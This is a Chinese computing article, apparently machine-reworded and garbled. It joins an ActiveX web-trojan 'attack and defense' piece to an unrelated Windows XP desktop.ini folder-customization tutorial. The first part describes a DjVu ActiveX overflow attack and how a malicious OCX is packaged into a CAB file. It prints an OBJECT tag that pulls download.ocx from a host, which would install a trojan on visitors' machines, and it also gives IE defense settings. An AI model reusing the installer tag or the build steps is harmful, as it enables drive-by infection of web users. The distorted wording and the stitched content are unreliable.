曾几何时， 应用ActiveX是流氓软件“行凶”的关键技术手腕之一，如今流氓软件大多都曾经作古了，可ActiveX并没有分开人们的视线，网页挂马看上了它，于是ActiveX挂马盛行起来，成为了关键的几种挂马方式之一。北岸团队张贵岭：资深安保工程师，从事安保行业十余年。ActiveX是微软开发的。微软的程序员似乎把环球构想得太过于残酷，以为没有人会用ActiveX作恶。当年恶意软件盛行的期间，一家名为“XX宝贝视频聊天室”的网站就曾应用色诱的方式，诱惑用户被动装置网站的ActiveX视频聊天控件。该ActiveX控件不只会被动跟踪用户网络消息，而且还有弹出广告、上行用户Word文档等流氓行为。当应用ActiveX作恶的流氓软件越来越多后，微软在IE7中就忍痛参与了关于ActiveX认证的措施。如今一切的ActiveX在IE7中都会先屏蔽，而不再像现在一样被动弹出装置窗口。小百科：ActiveX是Microsoft关于一系列战略性面向对象程序技术和工具的称说，ActiveX控件在经常使用时须要装置。谁捧红了ActiveX挂马？在流氓软件横蛮成长的那几年，流氓软件也似乎各路山贼土匪一样，往往会由于争夺用户电脑中的关键位置而出现火拼，于是许多用来制作病毒的技术被运行到了这些流氓软件身上。WwW.iTcompUtER.COm.cN起初病毒也开局向流氓软件取经，流氓软件经常使用的一些技术也被病毒拿来经常使用，ActiveX挂马应该是病毒从流氓软件身上学习的最彻底的技术。小百科：许多阅读器在支持ActiveX方面并不如IE来得踊跃，只管Firefox、网景等阅读器都在不同水平上支持ActiveX，然而ActiveX出现疑问最多的依然是IE阅读器。ActiveX会被挂马者应用，其实关键疑问在于它的认证机制。早期，假设一个网站上有须要装置ActiveX能力够看到的物品，那么在你访问该网站的时刻，关系的ActiveX会重复地弹出揭示要求你装置它，许多用户往往会由于各种要素点击“确定”，准许ActiveX控件装置。这就似乎你走在马路上，有一群人说自己原意跟你交好友，这些人在你背地逐一经过，你可以选用拍板赞同或许摇头否认，凡是你拍板赞同的人都可以成为你的好友，他们可以自在进出你的家。恐惧的是，有些人在成为你好友之后，你才发现他是个小偷或许无赖流氓。目前应用ActiveX挂马关键有两种方式，一种是应用反常程序的ActiveX破绽启动溢出挂马，另外一种则是间接编写恶意的ActiveX木马程序，将恶意的木马程序伪装成看似有某项性能的ActiveX控件，诈骗用户装置。接上去的案例中咱们将会为大家演示黑客如何应用ActiveX挂马。ActiveX挂马攻防实录方法1：经过破绽挂马攻黑客应用ActiveX启动网页挂马，最经常出现的方法就是应用那些有破绽的ActiveX控件启动挂马，经过用户系统内已有的ActiveX控件的触发，让木马在人不知，鬼不觉中植入用户的电脑。其中应用软件ActiveX破绽发起攻打的驰名例子有Flash和RealPlayer的ActiveX破绽挂马程序，这些软件的ActiveX破绽都曾经形成了极大的危害，特意是RealPlayer至今依然有黑客在经常使用它的ActiveX破绽启动挂马。上方以DjVu ActiveX控件破绽为例解说挂马的详细步骤，首先将恶意代码输入到写字板中，而后另存为恣意的HTML文件，而后应用IFRAME代码将生成的HTML文件嵌入到反常的网页中，此时输入网址关上含有DjVu ActiveX控件破绽的网页，本机的计算器程序就会被触发开启。而黑客理论不会这么残酷，他们会将Shellcode代码修正成下载指定恶意程序的代码，而后让用户在关上关系网站后中招（图1）。

小百科：DjVu ActiveX控件是用于紧缩图形文件的工具，它在处置超长的ImageURL属性参数时会出现溢出。防关于应用ActiveX破绽来启动挂马的行为，最好的防范方法是经常使用IE之外的阅读器，例如Firefox、Maxthon或360安保阅读器。此外，最好能够装置防挂马软件。方法2：编写ActiveX木马攻ActiveX木马是应用一些用户自觉地点击网页上弹出的ActiveX征询装置按钮的习气而启动流传的。许多用户往往并不能够分辨出哪些ActiveX控件是有害的，哪些ActiveX控件是有害的。那些ActiveX木马会打着视频聊天、美女图库等诱惑性的幌子，一些经不起诱惑的用户就会激动性地装置网页中的ActiveX木马。编写ActiveX木马，须要必定的编程基础，而且整个环节相当复杂，由于版面的要素，这里只向各位想成为安保工程师的好友便捷论述一下ActiveX木马的大抵编写环节。首先黑客会编写一个具备Download或许其余恶意性能的OCX控件，这是ActiveX木马的外围和灵魂，而后黑客会再编写一个Setup安保设置的INF文件，用CAB紧缩工具，例如WinCAB，将两个文件紧缩打包成一个CAB文件。最后黑客将该文件上行到自己的网站中，并在网页中写入调用装置ActiveX控件的代码即可开张期待阅读该网页的用户上钩（图2）。

调用代码如下：＜OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237codeBase=，0，0，0＞＜PARAM VALUE="http:// 192.168.1.1/web/download.ocx"＞＜/OBJECT＞这样的ActiveX木马是没有签名验证的，理论不会被准许装置，然而依然有方法可以打破这些安保限度。防要防止ActiveX木马的攻打只需制止ActiveX木马被调用运转就可以了。防范此种方式挂马的最好方法还是在客户终端机上操作，在客户终端机运转IE阅读器，点击“工具→Internet选项→安保→自定义级别”，将安保级别定义为“高”，对“ActiveX控件和插件”中第2项、第3项设置为“禁用”，其余项设置为“揭示”，之后点击“确定”（图3）。这样设置后，当你经常使用IE阅读网页时，就能有效防止ActiveX木马的攻打。

你厌倦XP那千遍一概的文件夹格调了吗？你想领有一个异乎寻常的、令人极度艳羡的、充溢共性的系统吗？本文，正是为你而预备的！更改文件夹图标，修正文件夹背景与文件夹内字体色彩，参与文件夹消息——不须要任何第三方软件，仅仅依托Windows自身的性能与小小的记事本你即可成功以上种种成果！上方，咱们就来看看一个个别的系统是如何摇身一变成为一台“巫妖王之怒”主题文件夹的系统吧！一、 修正文件夹图标修正图标应该是其中相对而言最便捷的了。首先，进入所要修正的文件夹。而后在文件夹中的空白处单击右键，在弹出的右键菜单当选用“自定义文件夹”选项。随后在弹出的窗口中咱们就可以看到更改图标的按钮了。选用它，在弹出的窗口中咱们就可以恣意地把文件夹图标改为咱们青睐的样式了。看，我的兽族酋长够酷吧（图1）！

二、 修正文件夹背景与文件夹内字体色彩有了守门的酋长，咱基地内的树立也不能落下啊。刚刚的更改图标其实只是小试牛刀，接上去要修正文件夹内的背景与字体色彩可就没那么便捷了。如今，修正完了图标，咱们须要先关上菜单栏“工具”内的“文件夹选项”，在“检查”选项卡当选中显示一切文件和文件夹并去掉“暗藏受包全的操作系统文件”前的小钩，保留。再回到刚才的文件夹，怎样，是不是发现多出了一个暗藏文件？它可不是什么病毒，而是在刚才修正图标后发生的，咱们接上去的主角是desktop.ini。小贴士：什么是desktop.ini？desktop.ini是文件夹选项的性能文件，它关键用来记载用户的文件夹图标、文件的检查方式和陈列方式等共性化消息。如今咱们双击它，自动状况下该文件是用记事本关上的。而后，咱们在其中参与以下内容（括号内中文为注释，不用输入）：[{BE098140-A513-11D0-A3A4-00C04FD706EC}]IconArea_Image=X:\XX\XX.jpg（用来做背景的图片的门路）IconArea_Text=0x000000FF （设定文件夹内字体色彩，代码示意24位色彩性能表中不同的值，0x000000FF为白色，黄色为“0x0000FFFF”，蓝色为“0x00FF0000”， 假设留空则默以为彩色），成果见图2。

修正成功后保留，刷新，OK！看，巫妖王坐在了咱们的文件夹背景中（图3）！

三、 为文件夹参与详细揭示消息在Windows 中，当咱们将鼠标指针移到一个文件夹上方逗留片刻，就会弹出一个揭示消息，消息中蕴含该文件夹的大小、文件夹中列在前面的文件夹及文件称号。其实除了让它显示这些基本消息之外，咱们还可以为文件夹参与更为详细的说明文字。例如，某个文件夹十分关键（例如装有我最青睐的魔兽），那么为了防止被他人误删，咱们就可以在这个弹出消息中加上自己的正告。详细做法其实很便捷，首先，依然是关上咱们刚刚的desktop.ini，在其中的“IconIndex”一行的下方加上“InfoTip=XXX”（InfoTip的位置可参见图2，双引号不用输入，等号后的XXX即为咱们所要参与的揭示消息）。OK，如今咱们保留，前往上一级的目录，把鼠标移到咱们的文件夹上，看到成果了吧（图4）？

当你将鼠标指针移动到文件夹上方时，并没有出现任何揭示消息，不用担忧，你还须要事行启动以下操作：关上菜单栏“工具”中的“文件夹选项”，而后选用“检查”，在“初级设置”列表中，选中“鼠标指向文件夹和桌面项时显示揭示消息”，而后单击“确定”保留即可。如今，成功了以上一切上班后，咱们只须要将这修正后的desktop.ini中的内容复制到其余文件夹的desktop.ini中，再把桌面背景一改，Oh yeah！整个系统的文件夹都变成“魔兽”主题的了！